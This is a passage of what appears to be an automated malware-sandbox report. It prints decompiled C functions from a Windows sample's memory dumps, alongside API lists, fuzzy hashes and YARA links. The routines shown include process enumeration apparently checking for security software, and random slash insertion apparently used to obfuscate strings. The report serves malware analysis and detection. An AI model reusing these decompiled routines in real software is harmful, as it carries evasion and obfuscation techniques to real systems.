						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00a74cd6
0x00a74cdd
0x00a74ce7
0x00a74ceb
0x00a74cf1
0x00a74cfe
0x00a74d05
0x00a74d09
0x00a74d1b
0x00a74d1d
0x00a74d1d
0x00a74d22
0x00a74d29
0x00a74d34
0x00a74d4a
0x00a74d4e
0x00a74d50
0x00a74d55
0x00a74d55
0x00a74d62
0x00a74d66
0x00a74d6a
0x00000000
0x00000000
0x00a74d78
0x00a74d7c
0x00000000
0x00000000
0x00a74d7c
0x00a74d66
0x00000000
0x00a74d7e
0x00a74d7e
0x00a74d7e
0x00a74d84
0x00a74d86
0x00a74d86
0x00a74d90
0x00a74d94
0x00a74da6
0x00a74da6
0x00a74daa
0x00a74db0
0x00a74db0
0x00a74db3
0x00a74db5
0x00a74db8
0x00a74db8
0x00a74dbf
0x00a74dc5
0x00a74dc5

APIs

Part of subcall function 00A71970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00A73EC5,74666F53,00000000,?,00000000,?,?,00A72F4F), ref: 00A719A6
Part of subcall function 00A71970: lstrcpy.KERNEL32(00000000,00000000), ref: 00A719CA
Part of subcall function 00A71970: lstrcat.KERNEL32(00000000,00000000), ref: 00A719D2

CreateEventA.KERNEL32(00A7A2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00A77338,?,?,?), ref: 00A74D14

Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F

WaitForSingleObject.KERNEL32(00000000,00004E20,00A77338,00000000,?,00000000,?,00A77338,?,?,?,?,?,?,?,00A71C40), ref: 00A74D72
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00A77338,?,?,?), ref: 00A74DA0
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00A77338,?,?,?), ref: 00A74DB8

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 69f970fd48f53f762416be2ec5e8c80e349b14dae45d35f03ee41299a89fb88c
Instruction ID: 5c6a721005b3416b2b9e583748253401a729ca107fd73e382cd5b42ce8a37039
Opcode Fuzzy Hash: 69f970fd48f53f762416be2ec5e8c80e349b14dae45d35f03ee41299a89fb88c
Instruction Fuzzy Hash: 6921B5326007226BD7319BA89D44B9B73E9BF5C751F05C225FE8D97292EB70CC428691

Uniqueness

Uniqueness Score: -1.00%

Function 00A77289, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00A77289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00A72616(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00A728B8(_t23);
						}
					}
					return _t38;
				}
				if(E00A74380(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xa7a2d4, 1, 0,  *0xa7a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00A77360(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00A7202E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00A73EFA(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00A74CD5( &_v32, _t39);
					goto L13;
				}
			}

0x00a77289
0x00a77296
0x00a7729c
0x00a7729d
0x00a7729e
0x00a7729f
0x00a772a0
0x00a772a4
0x00a772b0
0x00a772b4
0x00a7733c
0x00a7733c
0x00a7733f
0x00a77341
0x00a77349
0x00a7734f
0x00a77352
0x00a77352
0x00a7734f
0x00a7735d
0x00a7735d
0x00a772c7
0x00a772c9
0x00a772c9
0x00a772e0
0x00a772e4
0x00a772e7
0x00a772f2
0x00a772f9
0x00a772f9
0x00a77305
0x00a77306
0x00a77314
0x00a77308
0x00a77308
0x00a77309
0x00a7730a
0x00a7730b
0x00a7730c
0x00a7730d
0x00a7730d
0x00a77319
0x00a7731e
0x00a77320
0x00a77322
0x00a77322
0x00a77329
0x00000000
0x00a7732b
0x00a7732b
0x00a77338
0x00000000
0x00a77338

APIs

CreateEventA.KERNEL32(00A7A2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00A71C40,?,00000001), ref: 00A772DA
SetEvent.KERNEL32(00000000,?,?,?,?,00A71C40,?,00000001,00A72F7D,00000002,?,?,00A72F7D), ref: 00A772E7
Sleep.KERNEL32(00000BB8,?,?,?,?,00A71C40,?,00000001,00A72F7D,00000002,?,?,00A72F7D), ref: 00A772F2
CloseHandle.KERNEL32(00000000,?,?,?,?,00A71C40,?,00000001,00A72F7D,00000002,?,?,00A72F7D), ref: 00A772F9

Part of subcall function 00A77360: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A77319,?,00A77319,?,?,?,?,?,00A77319,?), ref: 00A7743A
Part of subcall function 00A77360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00A77319,?,?,?,?,?,00A71C40,?), ref: 00A77462

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 83707c62904b48c5286718169d06f9e70d54aab4688f2b6a7ae7c732fbf38b9c
Instruction ID: b93d9998c2488fe77b1847f06330a9f37956d3361ab53b16981b4d4b392a62ba
Opcode Fuzzy Hash: 83707c62904b48c5286718169d06f9e70d54aab4688f2b6a7ae7c732fbf38b9c
Instruction Fuzzy Hash: 0F218473D04219ABDF20AFE48C859EE73BDAB44350B45C425FA1DEB140DB74DD429BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A74138, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A74138(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xa7a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xa7a2a8; // 0x11ba88e3
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xa7a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00a74140
0x00a74143
0x00a74149
0x00a74161
0x00a74165
0x00a74168
0x00a7416a
0x00a7416d
0x00a7416f
0x00a74172
0x00a74174
0x00a74174
0x00a74176
0x00a74181
0x00a74186
0x00a74197
0x00a7419f
0x00a741a4
0x00a741a7
0x00a741aa
0x00a741ac
0x00a741b2
0x00a741b5
0x00a741b5
0x00a741b5
0x00a741c0
0x00a741c5
0x00a741cf

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A75B76,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A74143
RtlAllocateHeap.NTDLL(00000000,?), ref: 00A7415B
memcpy.NTDLL(00000000,05569630,-00000008,?,?,?,00A75B76,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A7419F
memcpy.NTDLL(00000001,05569630,00000001,00A76301,00000000,05569630), ref: 00A741C0

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 24480dd76763ed09297e93fbc42ed2c203ae6cb1f67dfca3bb431013eafb730a
Instruction ID: 0f5f9e3a796ad4cae976a820d12227639169f34a0b70f34abe4201c07e272fcf
Opcode Fuzzy Hash: 24480dd76763ed09297e93fbc42ed2c203ae6cb1f67dfca3bb431013eafb730a
Instruction Fuzzy Hash: 4B110672A00114BFC710DBA9DC84D9FBBBEDBD5361B058266F80DD7161EB709E8587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A749BA, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00A749BA(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00A75C4E(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xa792c4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xa792c4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00a749c5
0x00a749c9
0x00a749cb
0x00a749cc
0x00a749d4
0x00a749d4
0x00a749d8
0x00000000
0x00000000
0x00a749cf
0x00a749d0
0x00a749d3
0x00a749d3
0x00a749e0
0x00a749e7
0x00a749eb
0x00a749f3
0x00a749f9
0x00a749fb
0x00a74a00
0x00a74a04
0x00a74a06
0x00a74a09
0x00a74a10
0x00a74a10
0x00a74a1a
0x00a74a1d
0x00a74a20
0x00a74a20
0x00a74a2c
0x00a74a2c
0x00a74a39

APIs

StrChrA.SHLWAPI(?,00000020,00000000,0556962C,?,?,?,00A76072,0556962C,?,?,00A72F44), ref: 00A749D4
StrTrimA.SHLWAPI(?,00A792C4,00000002,?,?,?,00A76072,0556962C,?,?,00A72F44), ref: 00A749F3
StrChrA.SHLWAPI(?,00000020,?,?,?,00A76072,0556962C,?,?,00A72F44,?,?,?,?,?,00A744F9), ref: 00A749FE
StrTrimA.SHLWAPI(00000001,00A792C4,?,?,?,00A76072,0556962C,?,?,00A72F44,?,?,?,?,?,00A744F9), ref: 00A74A10

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: af453868ebe2326bf9651cd3b4fafc6faf9272a10c07702227a9485e52fd44d3
Instruction ID: 4e9b88f6c824e3912e8e9ac84545d818e8349dd53baab583e3e4398671c52113
Opcode Fuzzy Hash: af453868ebe2326bf9651cd3b4fafc6faf9272a10c07702227a9485e52fd44d3
Instruction Fuzzy Hash: A30196726453117BD321DF659C49F2B7A98EB9ABA0F11C519F589C7240E760880186A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A71970, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00A71970(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00A7354E(_t8, _t1);
				_t16 = E00A75C4E(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00A7756E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00A75C4E(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00A72A03(_t16);
				}
				return _t18;
			}

0x00a7197b
0x00a7197c
0x00a7197f
0x00a71981
0x00a7198c
0x00a71990
0x00a71995
0x00a71999
0x00a719a1
0x00a719a6
0x00a719ae
0x00a719ae
0x00a719b7
0x00a719bb
0x00a719c1
0x00a719c4
0x00a719ca
0x00a719ca
0x00a719d2
0x00a719d2
0x00a719d9
0x00a719d9
0x00a719e4

APIs

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

Part of subcall function 00A7756E: wsprintfA.USER32 ref: 00A775CA

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00A73EC5,74666F53,00000000,?,00000000,?,?,00A72F4F), ref: 00A719A6
lstrcpy.KERNEL32(00000000,00000000), ref: 00A719CA
lstrcat.KERNEL32(00000000,00000000), ref: 00A719D2

Strings

Soft, xrefs: 00A7197C, 00A71995

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 5dce5fc56271d86f46296d4423ccd5e5c2ac1cffbbfa099fda3a0bc65d85741a
Instruction ID: dbc28b8ff7f61e63d80a6b05e756276408e2b03e269e66a4b7f1fbfbb4cfff53
Opcode Fuzzy Hash: 5dce5fc56271d86f46296d4423ccd5e5c2ac1cffbbfa099fda3a0bc65d85741a
Instruction Fuzzy Hash: B201D132500209BBCB227BA99C85FEF3EADAF84391F05C426FA0C95111DB748987C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A719E7, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A719E7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xa7a2d0; // 0x4aed5a8
						_t2 = _t9 + 0xa7be04; // 0x73617661
						_push( &_v264);
						if( *0xa7a11c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00a719f2
0x00a719fc
0x00a71a00
0x00a71a0a
0x00a71a3b
0x00a71a11
0x00a71a16
0x00a71a23
0x00a71a2c
0x00a71a43
0x00a71a2e
0x00a71a36
0x00000000
0x00a71a36
0x00a71a44
0x00a71a45
0x00000000
0x00a71a45
0x00000000
0x00a71a3f
0x00a71a4b
0x00a71a50

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A719F7
Process32First.KERNEL32(00000000,?), ref: 00A71A0A
Process32Next.KERNEL32(00000000,?), ref: 00A71A36
CloseHandle.KERNEL32(00000000), ref: 00A71A45

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 79cc69ab6352e6c8b0f9ad00df7b72a9d84b412865c8d58cbc50ec60d6047a74
Instruction ID: 00abcffd1936bc6f490c8890a14d4ab753edee226d812b560a42d97e296f07e7
Opcode Fuzzy Hash: 79cc69ab6352e6c8b0f9ad00df7b72a9d84b412865c8d58cbc50ec60d6047a74
Instruction Fuzzy Hash: 99F030766021246AE720A76A9D49EEB76FCEBD5350F00C161F94ED2101EA209E8786B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E05146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E05146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6e0541b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e0541bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6e0541ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6e0541a8 = _t5;
					 *0x6e0541b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6e0541a4 = _t6;
					if(_t6 == 0) {
						 *0x6e0541a4 =  *0x6e0541a4 | 0xffffffff;
					}
					return 0;
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0517B8,73B763F0,00000000), ref: 6E05147B
GetVersion.KERNEL32 ref: 6E05148A
GetCurrentProcessId.KERNEL32 ref: 6E051499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0514B2

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: bc9079dbe920206525bea962aabf025604a249567bf963f7d334f0d46ea17963
Instruction ID: 531187bab72e9b062dfb684982b792fcbe5083937ac4a7727a072defc4854279
Opcode Fuzzy Hash: bc9079dbe920206525bea962aabf025604a249567bf963f7d334f0d46ea17963
Instruction Fuzzy Hash: C8F09A30646B10BFEF808FB9AF197823BE0F70AB11F00101AF106C92C4D3B044628F88

Uniqueness

Uniqueness Score: -1.00%

Function 00A76027, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A76027(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xa7a37c; // 0x5569630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xa7a37c; // 0x5569630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xa7a030) {
					HeapFree( *0xa7a290, 0, _t8);
				}
				_t14[1] = E00A749BA(_v0, _t14);
				_t11 =  *0xa7a37c; // 0x5569630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00a76027
0x00a76027
0x00a76030
0x00a76040
0x00a76040
0x00a76045
0x00a7604a
0x00000000
0x00000000
0x00a7603a
0x00a7603a
0x00a7604c
0x00a76050
0x00a76062
0x00a76062
0x00a76072
0x00a76075
0x00a7607a
0x00a7607e
0x00a76084

APIs

RtlEnterCriticalSection.NTDLL(055695F0), ref: 00A76030
Sleep.KERNEL32(0000000A,?,?,00A72F44,?,?,?,?,?,00A744F9,?,00000001), ref: 00A7603A
HeapFree.KERNEL32(00000000,00000000,?,?,00A72F44,?,?,?,?,?,00A744F9,?,00000001), ref: 00A76062
RtlLeaveCriticalSection.NTDLL(055695F0), ref: 00A7607E

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 1cdf0ecd4ecf8eef5ed8a2f929eac4180fd397c587c01f6acecd06901c004b26
Instruction ID: 621efacaf9d57f14d423a52d604c74de719e50aca29110d315d8cd5c714d1fb9
Opcode Fuzzy Hash: 1cdf0ecd4ecf8eef5ed8a2f929eac4180fd397c587c01f6acecd06901c004b26
Instruction Fuzzy Hash: F1F0FE74210640EBD720DFB9DC88F1A77A8AB69741B04C416F94DD6261C630EC87CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00A71547, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A71547() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xa7a2c4; // 0x2d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xa7a304; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xa7a2c4; // 0x2d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xa7a290; // 0x5170000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00a71547
0x00a7154e
0x00a71598
0x00a7159a
0x00a7159a
0x00a71552
0x00a71558
0x00a7155d
0x00a71561
0x00a71567
0x00a7156e
0x00000000
0x00000000
0x00a71570
0x00a71575
0x00000000
0x00000000
0x00000000
0x00a71575
0x00a71577
0x00a7157f
0x00a71582
0x00a71582
0x00a71588
0x00a7158f
0x00a71592
0x00a71592
0x00000000

APIs

SetEvent.KERNEL32(000002D0,00000001,00A74214), ref: 00A71552
SleepEx.KERNEL32(00000064,00000001), ref: 00A71561
CloseHandle.KERNEL32(000002D0), ref: 00A71582
HeapDestroy.KERNEL32(05170000), ref: 00A71592

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: e8224bacc3bce8b77390dd165a35d513106620256a07852976a2fc776b65e9d1
Instruction ID: 8f4aa45ae804f9335a0db5a312991821650742e2b0ccdd7f4897abb131d6cd8a
Opcode Fuzzy Hash: e8224bacc3bce8b77390dd165a35d513106620256a07852976a2fc776b65e9d1
Instruction Fuzzy Hash: E0F0A071B40301ABE720DBB8AD0DB4F37FCABA4712B00C110B81ED31A0DB24C9828591

Uniqueness

Uniqueness Score: -1.00%

Function 00A7461D, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00A7461D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xa7a37c; // 0x5569630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xa7a37c; // 0x5569630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xa7a37c; // 0x5569630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xa7b882) {
					HeapFree( *0xa7a290, 0, _t10);
					_t7 =  *0xa7a37c; // 0x5569630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00a7461d
0x00a74626
0x00a74636
0x00a74636
0x00a7463b
0x00a74640
0x00000000
0x00000000
0x00a74630
0x00a74630
0x00a74642
0x00a74647
0x00a7464b
0x00a7465e
0x00a74664
0x00a74664
0x00a7466d
0x00a7466f
0x00a74673
0x00a74679

APIs

RtlEnterCriticalSection.NTDLL(055695F0), ref: 00A74626
Sleep.KERNEL32(0000000A,?,?,00A72F44,?,?,?,?,?,00A744F9,?,00000001), ref: 00A74630
HeapFree.KERNEL32(00000000,?,?,?,00A72F44,?,?,?,?,?,00A744F9,?,00000001), ref: 00A7465E
RtlLeaveCriticalSection.NTDLL(055695F0), ref: 00A74673

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 79e5d45bca0468b95990198be123e0417328ad76c81960e6842b6d0c8378a650
Instruction ID: 0c7094e7de0e7812e94bf4346fd9138a850dece9909ed61283e00378c6b00d95
Opcode Fuzzy Hash: 79e5d45bca0468b95990198be123e0417328ad76c81960e6842b6d0c8378a650
Instruction Fuzzy Hash: CCF09E78610240EFE718CFA4EC99F1A77A5AB9D751B05C15AE90EDB370D730AC82CA16

Uniqueness

Uniqueness Score: -1.00%

Function 00A72FFC, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A72FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
